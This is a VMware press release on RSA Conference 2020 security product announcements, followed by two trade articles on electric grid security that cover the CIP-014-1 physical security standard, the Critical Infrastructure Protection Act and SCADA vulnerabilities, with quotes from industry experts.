VMware, Inc., an innovator in enterprise software, announces new innovations to advance the company’s strategy to make security intrinsic to the digital enterprise. Intrinsic security makes protecting critical applications and data more automated, proactive and pervasive across the entire distributed enterprise. The announcements made at RSA Conference 2020, include: New VMware Advanced Security for Cloud Foundation, which will enable customers to replace legacy security solutions and deliver unified protection across private and public clouds Advancements to the VMware Carbon Black Cloud, which including automated correlation with the MITRE ATT&CK framework and upcoming prevention coverage for Linux machines New VMware Secure State auto-remediation capabilities to automate actions across cloud environments and proactively reduce risk New Approach To Cybersecurity VMware’s Sanjay Poonen will deliver a keynote address: ‘Rethink the Way You Secure Your Organisation with Intrinsic Security,’ which will discuss how making security intrinsic can unlock new advantages and make life easier for security practitioners. There has never been a more challenging and exciting time in security" “There has never been a more challenging and exciting time in security,” said Sanjay Poonen, chief operating officer, customer operations, VMware. “Attacker sophistication, security threats, breaches, and exploits are becoming more prevalent with no end in sight. And with cloud, new applications, pervasive mobility, IoT, and data at the edge, the problem is only getting harder to solve. There must be a new approach to cybersecurity – one that is built-in, unified and context-centric.” Delivering best-in-class financial services “We believe the best strategy and approach is to make security intrinsic, enabling organisations to leverage their infrastructure and its unique capabilities across any app, any cloud and any device to better secure the world’s digital infrastructure – from networks, to endpoints, to workloads, to identities, to clouds.” “Our members rely on us to deliver best-in-class financial services,” said Mark Fournier, Systems Architect for the U.S. Senate Federal Credit Union. “VMware has put our team in a position to deliver consistent innovation, evolve our digital transformation and keep our data better secured amidst an attack landscape that’s constantly evolving. VMware’s ability to deliver and help secure our digital infrastructure gives us the confidence that we’re staying ahead of the latest threats in an environment where cybersecurity is built into the fabric of our enterprise, not just bolted on.” Single point of compromise Most security professional know this, but struggle to adequately protect their data centres Data breaches are increasingly devastating, often wiping out billions in market capitalisation and costing public company CEOs their jobs. Damage rarely results from a single compromised server. It results from attackers moving laterally (East-West) through the datacentre from a single point of compromise, often for months, as they locate, harvest and exfiltrate sensitive data. Most security professional know this, but struggle to adequately protect their data centres. A survey commissioned by VMware and conducted by Forrester Consulting shows that 75 percent of respondents depend on perimeter firewalls, however East-West security controls need to be different than those for traditional perimeter (North-South) security as 73 percent of respondents believe their existing East-West traffic is not adequately protected. Protecting data centre workloads VMware is specifically addressing the internal data centre security challenge with the new VMware Advanced Security for Cloud Foundation, which will include VMware Carbon Black technology, VMware NSX Advanced Load Balancer with Web Application Firewall capabilities and VMware NSX Distributed IDS/IPS. Each one is purpose-built for the data centre and together deliver a unique and more comprehensive data centre security solution. VMware Carbon Black technology protects workloads with Real-time Workload Audit/Remediation Also, all three will tightly integrate into VMware vSphere, the industry standard for data centre workloads, enabling security to follow workloads wherever they go through their entire life. Data centre security starts with a strong foundation—properly protecting data centre workloads. VMware Carbon Black technology protects workloads with Real-time Workload Audit/Remediation, Next-Generation Antivirus (NGAV) and Endpoint Detection & Response (EDR). Hardware-based solutions VMware Carbon Black will be tightly integrated with VMware vSphere to yield an ‘agentless’ solution, eliminating the need to insert antivirus and other agents. Instead, endpoint telemetry will be managed and gathered via built-in sensors protected by the hypervisor. This also means, unlike agent-based solutions, the hypervisor will be able to detect if an attacker attempts to gain root access and tamper with the VMware Carbon Black technology — all from a separate trust domain. The web server is the ‘front door’ of the data centre, and NSX Advanced Load Balancer / Web Application Firewall safeguards this frequent point of attack. Often customers using hardware-based solutions with fixed capacity will turn off security filtering under heavy loads, leaving critical servers vulnerable. The unique, scale-out software architecture of the NSX Web Application Firewall helps confirm web servers have enough computation capacity for maximum security filtering even under peak loads. Traditional perimeter security products Policies will be automatically generated and enforced on an application-specific basis The NSX Web Application Firewall uses rich understanding of applications, automated learning, and app-specific rules to provide strong security with lower false positives. Behind the web tier, micro-segmentation and in-band East-West firewalling helps prevent lateral movement of attackers. The VMware NSX Distributed IDS/IPS, a new capability of the VMware NSX Service-defined Firewall, will provide intrusion detection on the many different services that make up an application making it easier to get deep visibility. The distributed architecture of NSX Distributed IDS/IPS will enable advanced filtering to be applied to every hop of the application, significantly reducing the blind spots created when using traditional perimeter security products. Policies will be automatically generated and enforced on an application-specific basis, thereby lowering false positives. Discovering potential threats VMware has introduced automated correlation with MITRE ATT&CK framework Technique IDs (TIDs)—a list of common tactics, techniques, and procedures (TTPs)—built into the VMware Carbon Black Cloud. Using MITRE’s ATT&CK framework, customers can begin searching for specific TTPs based on MITRE ATT&CK techniques within the VMware Carbon Black Cloud to discover potential threats and identify areas of improvement in their security posture. VMware Carbon Black has also integrated with the Microsoft Windows Anti-Malware Scanning Interface (AMSI) to provide additional visibility by decoding obfuscated commands. Using the integration, customers will be able to seek visibility into the exact content executed by script interpreters, such as PowerShell. Customers will also be able to search across their continuously collected endpoint activity data and create custom detections based on AMSI-related script content. Endpoint prevention solutions VMware Carbon Black will be adding malware prevention capabilities for Linux machines Finally, VMware Carbon Black will be adding malware prevention capabilities for Linux machines. This innovation will empower customers to migrate away from other endpoint prevention solutions specific to Linux and consolidate their security programs. This addition to the VMware Carbon Black Cloud platform means customers will have the option for comprehensive security coverage across all major operating systems (Windows, Mac, and Linux). With VMware Secure State’s real-time detection and remediation capabilities, customers can now close the loop on cloud security and compliance to mitigate risks proactively. VMware Secure State is adding a new, flexible remediation framework to help customers automate actions across multicloud environments. Currently in Beta, this solution is designed to help cloud security teams collaborate with DevOps teams and gain trust as they gradually scale best practices. Maintaining centralised visibility The service provides pre-defined, out of the box actions or ability to create new, custom actions as code. All actions can be targeted to selectively remediate resources based on conditions such as cloud accounts, regions or resource tags. Security teams will also get comprehensive capabilities for managing overall cloud risk. To address existing misconfigurations, they can either bulk remediate violations themselves or publish actions to delegate decisions to DevOps teams. Customers maintain centralised visibility into remediation progress and changes to cloud resources In order to prevent new misconfigurations, they can build guardrails that auto-remediate violations at real-time speed. With an extensible, policy as code approach, users can programmatically execute all remediations as code using API and integrate them within the CI/CD pipeline. No matter how actions are triggered, customers maintain centralised visibility into remediation progress and changes to cloud resources. Hosting two breakout sessions The new portfolio offerings, product demos and more will be on display this week at the RSA Conference in the Moscone North Expo, booth #6145. VMware Carbon Black will be in Moscone Expo North, booth #5873. In addition to Poonen’s keynote address on February 26, VMware will host two breakout sessions during the conference. VMware’s SVP and GM of Network Security, Tom Gillis, will deliver ‘Unshackle Legacy Security Restrictions for 2020 and Beyond.’ VMware Carbon Black’s Cybersecurity Strategist, Rick McElroy, and Senior Threat Researcher, Greg Foss, will deliver ‘2020 ATT&CK Vision: Correlating TTPs to Disrupt Advanced Cyber Attacks.’
The FERC standard CIP-014-1 became effective, according to the Federal Register, on January 26, 2015 The electric power industry works with several federal agencies, including the Federal Energy Regulatory Commission (FERC), the Department of Homeland Security (DHS), and the Department of Energy (DOE) to improve sector-wide resilience for cyber threats. The industry also collaborates with the National Institute of Standards and Technology (NIST), the North American Electric Reliability Corporation (NERC), and federal intelligence and law enforcement agencies to strengthen its cyber security capabilities. Are the standards anywhere close enough to actually be of service? We shall soon see because last November CIP-014-1 was approved. It is the Physical Security Reliability Standard, developed by the North American Electric Reliability Corporation and approved by the U.S. Federal Energy Regulatory Commission. In December, the House of Representatives approved unanimously H.R. 3410, the Critical Infrastructure Protection Act (CIPA). This is the first time in four years that Congress has acted to begin to protect the nation’s electrical grid, and comes on the heels of CIP-014-1’s approval. Aim of the new bill The bill enjoys strong bipartisan support, but it remains to be seen whether it will become law. It has been read in the Senate and referred to the Committee on Homeland Security and Governmental Affairs. Its purpose is to see that DHS: Include in national planning scenarios the threat of electromagnetic pulse (EMP) which would entail the education of the owners and operators of critical infrastructure, as well as emergency planners and emergency responders at all levels of government of the threat of EMP events; Engage in research and development aimed at mitigating the consequences of naturally occurring or man-caused EMP events; Produce a comprehensive plan to protect and prepare the critical infrastructure of the American homeland against EMP events. FERC’s standard CIP-014-1, has six requirements, including Utilities must devise physical security plans for each of their respective transmission stations, transmission substations, and their primary control centre (one of the CIP-014-1 requirements) Performing risk assessments periodically to identify weak transmission stations and substations; The transmission owner must modify trouble spots accordingly and implement procedures for protecting sensitive or confidential information; Transmission owners must let operators know there are issues so they can address them. Owners and transmission operators must conduct an evaluation of the potential threats and vulnerabilities of a physical attack on each of its respective transmission stations, transmission substations, and primary control centers identified as critical under the first requirement; Utilities must devise physical security plans for each of their respective transmission stations, transmission substations, and their primary control center; Finally, they must have an unaffiliated third party with appropriate experience review its evaluation and security plan and then respond to the recommendations. However, Todd Borandi, an industry veteran and information security architect, sees these regulations as a day late and a dollar short. He credits hackers for today’s push for regulations “because several groups made it a public point to demonstrate how easy it is to access sensitive systems and steal data, so the outcry from the private, public and even the government demanded regulations causing this whole cycle to start all over again.” The FERC standard became effective, according to the Federal Register, on January 26, 2015. It remains to be seen whether or not the boxes get checked in lieu of an improvement in physical security. Wind - The savior? Ironically, what might be of more help is a very simple solution: wind. LogRhythm’s Greg Foss says “Wind could be the saviour” because the Department of Energy is working on outputting windmill energy into batteries. Foss is senior security research engineer for Boulder, Colo.-based LogRhythm, a security intelligence firm. One thing is to upgrade equipment, but as we’ve discovered that demands a huge money outlay, and as Foss says, “Right now, utilities have no real need to do this even though there have been 97 attacks against the grid so far this year.” Foss’ company creates honeypots, which are traps for hackers. “Once they get in,” he says, “we can track them and learn.” He says that a so-called con pot is under development. It would simulate SCADA by running, for example, a gas main, a utility box or a water-heating system, which is a prime target for hackers who wish to fudge temperature readings and make things look cooler than they really are. His best advice is “Hire the right people, train them well and give them the tools to build solutions. Security isn’t that easy to learn and they have to have the tools to succeed.” His company’s mantra is “not if, when,” and those words should resound loudly at all utility firms.
Forty-one percent of cyber incidents involved the energy sector The Bipartisan Policy Center, the Industrial Control Systems Cyber Emergency Response Team, which is part of the U.S. Department of Homeland Security, reports responding to 198 cyber incidents in fiscal year 2012 across all critical infrastructure sectors. Forty-one percent of these incidents involved the energy sector, particularly electricity, according to a February 2014 report. Considering the enormity of the system, it soon becomes clear that 198 events is the very tip of an enormous iceberg. Greg Foss, senior security research engineer for Boulder, Colo.-based LogRhythm, a security intelligence firm, says “an average breach lasts 480 days before a company knows they’ve been attacked.” He also says that most utilities are slow to address the problem because of upgrade costs, and that “some of them are still running Windows 98.” There is much talk about creating a “smart grid,” which, according to the Department of Energy is “computerising” the electric utility grid and includes adding two-way digital communication technology to devices associated with it. As DoE says: “Each device on the network can be given sensors to gather data (power meters, voltage sensors, fault detectors, etc.), plus two-way digital communication between the device in the field and the utility’s network operations center.” A key feature of the smart grid is automation technology that lets the utility adjust and control each individual device or millions of devices from a central location. Therein is the problem. The whole concept of a SCADA system is that it provides a way to monitor a number of items within one facility, and it has worked so well that many companies run everything into a computer to control all facets of operation. Much of the equipment in the “smart grid,” including transformers and generators, are operated by SCADA (supervisory control and data acquisition), which is a system that operates with coded signals running over communication channels. The whole concept of a SCADA system is that it provides a way to monitor a number of items within one facility, and it has worked so well that many companies run everything into a computer to control all facets of operation. “SCADA monitors devices on the grid many times per second and was never intended or designed to have virus protection or security protocols,” says Dave Hunt, an independent homeland security consultant and a founding member of the National InfraGard Electromagnetic Pulse special interest group. In fact, continuous monitoring makes it virtually impossible for a SCADA system to validate a security protocol. Adding to the misery is that an evildoer can purchase a SCADA attack for about $500, not to mention that the systems were designed by engineers, not computer people, so they don’t necessarily communicate well. These systems are called embedded systems and the bad guys are fighting them hard. According to Daniel Geer, Sc.D, chief technical officer of @Stake, in Cambridge, Mass., “Cyber smart bombs are what nations are working on.” These bombs are designed to attack embedded systems like SCADA. He strongly feels that “Embedded systems either need to have a remote management interface or they need to have a finite lifetime. They cannot be immortal and unfixable because to do so is to guarantee that something bad will happen.” But to change them would cost the utilities more money. Todd Borandi, CISSP, an industry veteran and information security architect says, “The root to all security issues is the vendor supplying the hardware and software. This equipment is provided by a small group of companies that experience little to no pressure to provide specialized secure software or hardware, which is expected to last more than a decade with little chance of an update. Many of these devices can now be rebooted and even overwritten from anywhere and by anyone.” He adds that “Another important issue is the idea that regulatory compliance is a sustainable solution to cyber security challenges. Regulatory laws are often slow to implementation and provide little meaningful guidance or enforcement in a dynamic field like technology.”